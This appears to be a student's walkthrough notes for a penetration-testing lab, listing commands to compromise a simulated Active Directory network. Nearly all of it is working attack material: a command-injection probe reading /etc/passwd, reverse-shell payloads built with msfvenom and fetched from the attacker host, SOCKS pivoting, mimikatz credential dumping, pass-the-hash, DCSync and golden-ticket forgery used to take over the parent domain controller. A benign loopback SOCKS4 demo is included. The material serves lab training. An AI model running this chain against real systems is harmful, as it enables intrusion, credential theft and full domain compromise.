Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:<domain SID, the whoami /all SID without its trailing RID> /krbtgt:<NTLM hash of krbtgt> /startoffset:0 /endin:600 /renewmax:10080 /ptt"' -Verbose
klist
** Case Study : 30 Days Access Lab
Lab Overview
001-Initial Access
* VPN IP Range : 10.10.200.0/24
* External IP Range in Scope : 192.168.80.0/24
* Internal IP Range in Scope : 192.168.98.0/24
nmap -sn 192.168.80.0/24
nmap -sn 192.168.98.0/24
nmap -sC -sV 192.168.80.10
Open the discovered IP in Google Chrome with Burp Suite proxying it. Use the search box or the Gmail subscribe form: replace the search value (or the e-mail value) with :ls, send the request to Repeater and check whether the response changes (a command injection test).
If the response lists sensitive files, try :cat /etc/passwd
Credentials found : user privilege / password Asmin@962
With the credentials, try SSH, since the SSH port is open :
ssh privilege@192.168.80.10
002-Enumeration
* Tools : crta
Serve files from Kali so they can be fetched from the server as privilege@192.168.80.10 :
python3 -m http.server
On the victim Linux box, fetch the file :
cd /tmp
Check what the privilege user can do :
curl http://[OUR KALI IP]:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Go through all the logs and everything the tool flags as worth a look.
sudo -l
ip a
Show hidden files :
ls -lah
Discover the internal range (from the compromised host if nmap is available, otherwise through the pivot set up in the next step) :
nmap -sn 192.168.98.0/24
nmap -sC -sV [discovered IP]
Read all history and log files; in the video the credentials were found in .vnc_log
The Firefox profile holds the saved bookmarks :
cd .mozilla
cd firefox
cd on82i5pd.default-release/
ls | grep pla
sqlite3 places.sqlite
.tables
select * from moz_bookmarks;
# shows the saved bookmarks; in the video a URL was bookmarked together with its password
.quit
003-pivoting-ssh
sudo apt install proxychains
sudo nano /etc/proxychains.conf
Add the proxy under [ProxyList]. Keep only one of the two lines active and comment out the other: OpenSSH's -D listener speaks both SOCKS4 and SOCKS5, and two active lines with strict_chain make proxychains try to chain through the same port twice.
socks5 127.0.0.1 9050
#socks4 127.0.0.1 9050
ssh -D 9050 privilege@192.168.80.10
Once connected, test reachability of the Windows host from Kali. Note that ping is ICMP and cannot go through a SOCKS proxy, so proxychains ping 192.168.98.30 only proves a direct route, not the pivot; use a TCP check instead :
proxychains nc -v 192.168.98.30 445
(without proxychains, nc 192.168.98.30 445 should fail, because Kali has no route to the internal range)
Scanning through the pivot (TCP connect only; -sn host discovery and SYN scans do not go through SOCKS, so skip discovery with -Pn) :
proxychains nmap -sT -Pn 192.168.98.30
004-Pivoting-Rpivot
Set up rpivot (it is Python 2 code, so use a Python 2.7 environment) :
conda create -n rpivot python=2.7
conda activate rpivot
Check whether the SOCKS port is already in use. The ssh -D forward below also uses 9050, so close it before starting the rpivot server, or give rpivot another --proxy-port :
netstat -ant | grep 9050
SSH
ssh -D 9050 privilege@192.168.80.10
Upload rpivot.zip to the tools directory and serve it from Kali :
python3 -m http.server
Download rpivot.zip on the victim Linux box :
curl http://[OUR KALI IP]:8000/rpivot.zip --output rpivot.zip
unzip rpivot.zip
cd rpivot
cd rpivot-master/
On the victim (the client connects back to Kali, so nothing has to listen on the victim) :
python client.py --server-ip [KALI IP] --server-port 9980
On Kali (the server accepts the client on 9980 and exposes a SOCKS4 proxy on 127.0.0.1:9050) :
python2 server.py --server-port 9980 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 9050
proxychains nmap -sT -Pn 192.168.98.30
proxychains nmap -sT -Pn -sC -sV 192.168.98.30
sudo nano /etc/proxychains.conf
rpivot's server is a SOCKS4 proxy, so make socks4 the active ProxyList line and disable socks5 :
#socks5 127.0.0.1 9050
socks4 127.0.0.1 9050
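What happens on the wire in the Network Pivoting DEMO (ssh -D 8090 plus a socks4 ProxyList line) and in 003/004 above, as an added example (my code, not the course's and not from proxychains, OpenSSH or rpivot): a client builds the SOCKS4 CONNECT request that proxychains sends to 127.0.0.1:9050, a minimal in-process SOCKS4 proxy plays the role of the ssh -D listener or rpivot's server.py (parse the request, dial the real destination, relay bytes both ways), and an echo listener stands in for the internal host. Both servers are constructed fixtures on loopback so the block runs offline; the addresses used in the test (10.10.10.4:445) appear only in a packed request, nothing is sent to them.

```python
import socket
import struct
import threading

SOCKS4_VERSION, SOCKS4_CMD_CONNECT = 4, 1
SOCKS4_GRANTED, SOCKS4_REJECTED = 0x5A, 0x5B


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS exchange")
        buf += chunk
    return buf


def build_connect_request(dst_ip: str, dst_port: int, userid: bytes = b"") -> bytes:
    """SOCKS4 CONNECT: VN=4, CD=1, DSTPORT (2 bytes BE), DSTIP (4 bytes), USERID, NUL.
    This is what proxychains sends to 127.0.0.1:9050 for a 'socks4' ProxyList entry."""
    return struct.pack("!BBH4s", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, dst_port,
                       socket.inet_aton(dst_ip)) + userid + b"\x00"


def parse_connect_reply(reply: bytes) -> bool:
    """8-byte reply: VN=0, CD=0x5A granted (0x5B..0x5D rejected), DSTPORT, DSTIP (ignored)."""
    if len(reply) != 8 or reply[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    return reply[1] == SOCKS4_GRANTED


def socks4_connect(proxy: tuple, dst_ip: str, dst_port: int, timeout: float = 3.0) -> socket.socket:
    """Open a TCP stream to dst via a SOCKS4 proxy, as `proxychains nc dst port` does.
    Only TCP can be tunnelled this way: ICMP (ping) and raw SYN scans never reach the proxy."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(build_connect_request(dst_ip, dst_port))
    if not parse_connect_reply(_recv_exact(s, 8)):
        s.close()
        raise ConnectionError(f"SOCKS4 CONNECT to {dst_ip}:{dst_port} rejected")
    return s


def _pump(src, dst):
    """Copy bytes one way until EOF, then tear both sides down."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    for s in (src, dst):
        try:
            s.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass


def socks4_handler(client):
    """Proxy side (the role of ssh -D / rpivot server.py): parse CONNECT, dial onward, relay."""
    vn, cd, port, ip = struct.unpack("!BBH4s", _recv_exact(client, 8))
    while _recv_exact(client, 1) != b"\x00":   # skip USERID up to the NUL
        pass
    try:
        if vn != SOCKS4_VERSION or cd != SOCKS4_CMD_CONNECT:
            raise OSError("unsupported request")
        upstream = socket.create_connection((socket.inet_ntoa(ip), port), timeout=3.0)
        upstream.settimeout(None)
    except OSError:
        client.sendall(struct.pack("!BBH4s", 0, SOCKS4_REJECTED, port, ip))
        client.close()
        return
    client.sendall(struct.pack("!BBH4s", 0, SOCKS4_GRANTED, port, ip))
    threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
    threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()


def echo_handler(conn):
    """Stand-in for the internal host (e.g. 192.168.98.30): echoes what it receives."""
    with conn:
        while chunk := conn.recv(4096):
            conn.sendall(chunk)


def serve(handler, host: str = "127.0.0.1"):
    """Constructed fixture: run handler(conn) per client on an ephemeral port; returns (port, stop)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(8)
    srv.settimeout(0.2)
    stop = threading.Event()

    def loop():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            conn.settimeout(None)
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
        srv.close()

    t = threading.Thread(target=loop, daemon=True)
    t.start()
    return srv.getsockname()[1], lambda: (stop.set(), t.join())


def pivot_roundtrip(payload: bytes = b"hello through the pivot") -> bytes:
    """End to end: client -> SOCKS4 proxy -> 'internal' echo host, and back."""
    echo_port, stop_echo = serve(echo_handler)
    proxy_port, stop_proxy = serve(socks4_handler)
    try:
        tunnel = socks4_connect(("127.0.0.1", proxy_port), "127.0.0.1", echo_port)
        tunnel.sendall(payload)
        reply = _recv_exact(tunnel, len(payload))
        tunnel.close()
        return reply
    finally:
        stop_proxy()
        stop_echo()


if __name__ == "__main__":
    print(pivot_roundtrip())
```

Two practical consequences follow from the exchange: the destination address travels inside the SOCKS request, so name resolution happens on the client unless proxychains' proxy_dns is on (otherwise internal names such as child.warfare.corp will not resolve from Kali), and a rejected CONNECT (0x5B) is what a closed port looks like through the pivot, which is why proxychains nmap needs -sT -Pn rather than -sn or -sS.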
005-Internal-Access
ssh -D 9050 privilege@192.168.80.10
python3 -m pip install impacket
Install CrackMapExec :
cd tools
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec
poetry run cme
Test the credentials found in .vnc_log against SMB on the Windows host, through the pivot :
proxychains poetry run cme smb 192.168.98.30 -u employee -p password123@
proxychains poetry run cme smb 192.168.98.30 -u john -p @dminP$ass
(Pwn3d! in the output means the account is a local administrator on that host)
Get a shell with impacket's psexec.py :
proxychains psexec.py 'child/john:@dminP$ass@192.168.98.30'
whoami
net user /dom
ping [DOMAIN NAME]   # ex: child.warfare.corp
net group /dom
ping [FULL DOMAIN NAME]   # ex: child.warfare.corp
ping [PARENT DOMAIN NAME]   # ex: warfare.corp, check whether it resolves to a different IP (the parent DC)
Build a reverse shell on Kali and start the listener :
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=[KALI IP] LPORT=9990 -f exe -o rev.exe
nc -nvlp 9990
In the psexec shell, fetch and run it :
powershell
iwr http://[KALI IP]:8000/rev.exe -OutFile C:\Users\[USERNAME]\Downloads\rev.exe
exit
cd C:\Users\[USERNAME]\Downloads
dir
rev.exe
Back in the nc -nvlp tab (the reverse shell) :
net user /dom
net user [USERNAME] /dom
net user [ANOTHER USERNAME] /dom   # check each one until you find one in an administrator group
net localgroup Administrators
006-Lateral movement
Still in the nc -nvlp tab :
C:\Users>
dir
whoami /priv
whoami
cd [username]
powershell
iwr http://[KALI IP]:8000/mimikatz.exe -OutFile C:\Users\[USERNAME]\Downloads\mimikatz.exe
cd Downloads
mimikatz.exe
If it does not run from PowerShell, exit to cmd first :
exit
mimikatz.exe
privilege::debug   # needed before reading LSASS; requires local admin
sekurlsa::logonpasswords
From Kali, check the other hosts with the NTLM hash just obtained (pass-the-hash; -H takes LM:NT, so the leading colon means an empty LM part) :
proxychains poetry run cme smb 192.168.98.120 -u corpmngr -H :[NTLM HASH]   # if it times out, try the other IPs already discovered until Pwn3d!
proxychains psexec.py 'child/corpmngr@192.168.98.120' -hashes :[NTLM HASH]   # if that fails, try all the IPs
ipconfig
net user /dom
007-Moving Child DC to Parent DC - part 1
Create the payload :
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=[KALI IP] LPORT=9990 -f exe -o rev.exe
conda deactivate
Fetch the file on the target :
cd C:\Users
Back in the terminal with the listener :
dir
cd Downloads
powershell
iwr http://[KALI IP]:8000/rev.exe -OutFile C:\Users\[USERNAME]\Downloads\rev.exe
exit   # exit PowerShell
Run the program so the listener receives the shell :
dir
rev.exe
exit
ipconfig
net user /dom
powershell
iwr http://[KALI IP]:8000/PowerView.ps1 -OutFile C:\Users\[USERNAME]\Downloads\PowerView.ps1
Import-Module .\PowerView.ps1
Enumerate the trust between the child and the parent domain (the Get-AD* cmdlets need the AD RSAT module; Get-Domain*/Get-Net* are PowerView) :
Get-ADTrust -Filter *
Get-DomainTrust
Get-ADForest
(Get-ADForest).Domains
net localgroup Administrators
Get-ADDomain -Server child.warfare.corp
Domain SIDs (copy both, the child domain SID and the parent domain SID) :
Get-DomainSID -Domain warfare.corp
Get-NetForestDomain
(Get-NetForestDomain).DomainControllers
exit
iwr http://[KALI IP]:8000/mimikatz.exe -OutFile C:\Users\[USERNAME]\Downloads\mimikatz.exe
exit   # exit PowerShell
mimikatz.exe
lsadump::dcsync /domain:child.warfare.corp /user:krbtgt
lsadump::dcsync /domain:child.warfare.corp /all   # as in the YouTube video
lsadump::dcsync /user:krbtgt
exit
klist
dir \\dc01.warfare.corp\C$   # access denied: we are only admin in the child domain
mimikatz.exe
Forge a golden ticket for the child domain that carries the parent's Enterprise Admins group (parent domain SID + RID 519) as an extra SID. /sid is the CHILD domain SID (the domain the ticket is issued for), /sids is the PARENT domain SID with -519, and the key is the child krbtgt AES256 key; SID filtering is not applied across a parent-child trust, which is why this works :
kerberos::golden /user:Administrator /domain:child.warfare.corp /sid:[child domain SID] /sids:[parent domain SID]-519 /aes256:[child krbtgt AES256 key] /startoffset:-5 /endin:600 /renewmax:10080 /ptt
exit
dir \\dc01.warfare.corp\C$
klist
If running mimikatz on the host is not an option, the child krbtgt keys can also be pulled remotely with impacket :
proxychains secretsdump.py 'child/corpmngr@192.168.98.120' -hashes :[NTLM HASH]
# copy : krbtgt NTLM
# copy : krbtgt AES256
cd C:\Users\[USERNAME]
008-Moving Child DC to Parent DC - part 2
powershell
iwr http://[KALI IP]:8000/PsExec.exe -OutFile C:\Users\[USERNAME]\Documents\PsExec.exe
exit
PsExec.exe -accepteula \\dc01.warfare.corp cmd.exe
or
PsExec.exe \\dc01.warfare.corp cmd.exe
If that does not give a usable shell (PsExec inside a reverse shell has no proper console), push a second reverse shell to the DC instead. derev.exe is built like rev.exe but with LPORT=8888 to match this listener :
conda deactivate
nc -nvlp 8888
iwr http://[KALI IP]:8000/derev.exe -OutFile C:\Users\[USERNAME]\Documents\derev.exe
exit   # exit PowerShell
dir \\dc01.warfare.corp\c$
copy derev.exe \\dc01.warfare.corp\C$\derev.exe
dir \\dc01.warfare.corp\c$
PsExec -d \\dc01.warfare.corp cmd /c "C:\derev.exe"
In the nc -nvlp 8888 tab, now on the parent DC :
ipconfig
net user /dom
whoami
cd C:\Users
dir
Complete these THM rooms on Active Directory attacks
* https://tryhackme.com/module/hacking-active-directory
* https://tryhackme.com/room/breachingad
* https://tryhackme.com/jr/lateralmovementandpivoting
* https://tryhackme.com/room/attacktivedirectory
* https://tryhackme.com/room/exploitingad
* https://tryhackme.com/room/credharvesting